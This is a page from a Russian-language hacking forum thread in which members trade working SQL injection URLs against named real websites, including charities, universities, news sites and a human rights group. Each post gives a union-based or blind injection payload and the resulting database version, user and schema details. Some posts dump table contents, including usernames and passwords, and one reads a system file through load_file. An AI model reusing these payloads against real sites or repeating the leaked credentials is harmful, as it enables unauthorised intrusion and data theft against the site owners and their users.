SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.reintregirea.ro/index.php?cid=stire-1228+union+select+1,2,concat_ws(0x3a,@@version_compile_os,version(),database(),user()),4,5,6,7+limit+1,1

    Database Version: 5.0.32-Debian_7etch8-log
    Database name: biserica
    User name: usrbbsir@localhost
    Os : pc-linux-gnu
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.tradeunionsdunit.org/profiles/profiles.php?ID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2/*
    TUAC@localhost:tuac:4.1.13-nt

    Code:
    http://www.danishww2pilots.dk/articles.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8
    [email protected]:danishww2pilots:5.0.32-Debian_7etch10-log
     
  3. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.remsoft.ca {PR 5}
    Code:
    http://www.remsoft.ca/news.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
    4.1.22-community-nt-log : remsoft : remsoft@WSH-004
     
  4. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    http://macinplay.de
    Code:
    http://macinplay.de/ViewReview.php?id=-342+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6--
    version():5.0.32-Debian_7etch1~bpo.1-log
    database():macinplay_de
    user():ftp49963@localhost
    os:pc-linux-gnu: 2

    tables:
    Code:
    http://macinplay.de/ViewReview.php?id=-342+union+select+1,2,table_name,4,5,6+from+information_schema.tables--
     
  5. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.parkinsonalliance.org {PR 6}
    Code:
    http://www.parkinsonalliance.org/news.php?ID=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11--
    5.0.67 : parkinsonalliance_org_-_maindb : parky@localhost

    ----------------------------------------------------------------------------------------------------

    http://www.theciel.com {PR 5}
    Code:
    http://www.theciel.com/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12--
    5.0.51a-3ubuntu5.4 : ciel : ciel@localhost
     
    #9205 Skofield, 8 May 2009
    Last edited: 8 May 2009
  6. d1aVOL

    d1aVOL Elder - Старейшина

    Joined:
    29 Jul 2007
    Messages:
    37
    Likes Received:
    6
    Reputations:
    0
    http://www.artemismusic.com/page.php?id=-1+union+select+1--
    4.1.22-standard-log
    [email protected]
     
  7. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.ftlauderdalenews.net {PR 3}
    Code:
    http://www.ftlauderdalenews.net/news.php?id=-140+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8--
    4.1.20-max-log : Promena_news : [email protected]

    tabla users:
    Code:
    http://www.ftlauderdalenews.net/news.php?id=-140+union+select+1,2,3,concat_ws(0x3a,name,password),5,6,7,8+from+users--
    Ray Brasted : 1x2y3z

    --------------------------------------------------------------------------------------------------------------------------------

    http://www.omnisens.ch {PR 5}
    Code:
    http://www.omnisens.ch/ditest/doc-news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14/*
    4.1.22-log : db1034902 : user10349@web03

    --------------------------------------------------------------------------------------------------------------------------------

    http://www.nnpn.org {PR 5}
    Code:
    http://www.nnpn.org/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*
    4.1.22-max-log : nnpn : [email protected]
     
    #9207 Skofield, 8 May 2009
    Last edited: 8 May 2009
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.hlg.edu/common/profiles/profiles.php?id=-1+union+select+1,2,3,4,5,6,7,unhex(hex(concat_ws(0x3a,user(),database(),version()))),9,10,11,12,13,14
    root@localhost:site_pages:5.0.15-nt
    Code:
    http://www.hlg.edu/common/profiles/profiles.php?id=-1+union+select+1,2,3,load_file(0x433A5C626F6F742E696E69),5,6,7,8,9,10,11,12,13,14
    boot.ini
     
    1 person likes this.
  9. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    PR: 4

    http://www.wostep.ch/index.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),databa se(),vers ion()),4,5+ --+&lang=en


    web193@localhost:usr_web193_1:5.0.45
     
    _________________________
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.riff.it/php/show.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52
    [email protected]:Sql44172_1:4.0.30-standard-log
     
  11. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Пацаны с праздником,ну что поехали по немцам ;)

    http://carnageclan.de/download_info.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14/*

    v099182@localhost:v099182:4.1.21-max-log


    есть форум :) tam


    P.S за этот сайт спс mailbrush'y (3a no/\y4eHue info)
    ############################################################

    http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

    web3_bitesser@localhost:web3_bitesser:5.0.26-log 1.1


    tables:

    http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+information_schema.tables+group+by+table_schema+limit+1,1--


    bit_scri_imp,rel_gs_group_gs_rights,rel_bit_member_bit_scri_imp,bit_tip,rel_tipprechnung_tippposten,rel_bit_news_bit_news_cat,forum_member,bit_job,rel_bit_scri_bit_scri_his,generic_id_tablenames,bit_news_sta,rel_bit_tip_bit_tip_cat,gs_rights,gs_user,bit_scri_lan,rel_gs_user_gs_group,rel_bit_member_bit_tip,bit_tip_cat,tippkunde,rel_bit_news

    http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat (column_name),9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+information_schema.columns+where+table _name=0x67735f75736572--

    generic_id,id,creation_date,creation_time,modify_date,modify_time,active,username,password,name,surname

    (но что то она пустая)))
     
    _________________________
    #9211 HAXTA4OK, 9 May 2009
    Last edited: 9 May 2009
    1 person likes this.
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,version(),null,null,null,null,null,null,null,null,null,null,null,null
    POSTGRESQL 7.1.3 ON SPARC-SUN-SOLARIS2.7, COMPILED BY GCC 2.8.1

    Первый раз встречаюсь с PgSQL.
     
    2 people like this.
  13. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.carolinainnatvg.com/news_detail.php?n_recid=-17+UNION+SELECT+1,2,3,4,5,6,7,8,9

    Database Version: 5.0.45-log
    Database name: biztools_carolinainn
    User name: biztools_127@localhost

    http://www.mytimber.net/news_detail.php?newsid=11+UNION+SELECT+1,2,3,4,5,6,7,8,9+LIMIT+1,1

    Database Version: 4.0.24-log
    Database name: uob0q1_db
    User name: uob0q1@localhost
     
    #9213 Rubaka, 9 May 2009
    Last edited: 9 May 2009
  14. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    sql - blind
    <<Центр дистанцонного обучения>>
    Code:
    http://www.tsiac.ru/cdo/index.php?id=14+or+ascii(substring(version(),1,1))=52--+
    db: 4.......
     
    1 person likes this.
  15. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    blind-sql:
    www.aimp.ru
    Code:
    http://aimp.ru/index.php?do=view&id=5161+and+ascii(lower(substring(user(),2,1)))=105
    
    user():aimp
    Code:
    http://aimp.ru/index.php?do=view&id=5161+and+substring(version(),1,1)=4
    version():4....пля в 4й версии mysql неподдержуются подзапросы((((
     
    1 person likes this.
  16. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    http://www.derechoshumanos.org.mx/modules.php?name=News&file=article&sid=-301+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14

    Вот только скобки фильтруются...
     
  17. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Target: metrocasas.com.mx

    Evil link: http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,2,3,4

    Database info (user:version:database):
    visiondig@localhost:4.1.21-standard-log:visiondig_metro

    Users:
    http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,group_concat(login,0x3a,password),3,4+from+users
     
  18. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    http://www.islam.com.mx/quiz_output.php?quiz_id=2%27/**/union/**/select+1,password,username,4,5,6,7,8,9+from+user/*

    login: smontiel
    pass: 445339 (за пасс благодарю поисковую систему гугл)
     
    #9218 F4R, 9 May 2009
    Last edited by a moderator: 9 May 2009
  19. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    http://cambiodeluces.arts-history.mx/entrada.php?id=-254+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--

    Database Version: 5.0.45-log
    Database name: neoartes
    User name: neoartes@localhost

     
  20. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.kvbpr.com {PR 3}
    Code:
    http://www.kvbpr.com/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
    5.0.67-community : kvbpr_kvbpr08 : kvbpr_idesign@localhost

    table users:
    Code:
    http://www.kvbpr.com/news.php?id=-1+union+select+1,group_concat(name,0x3a,pass),3,4,5+from+users--
     
Thread Status:
Not open for further replies.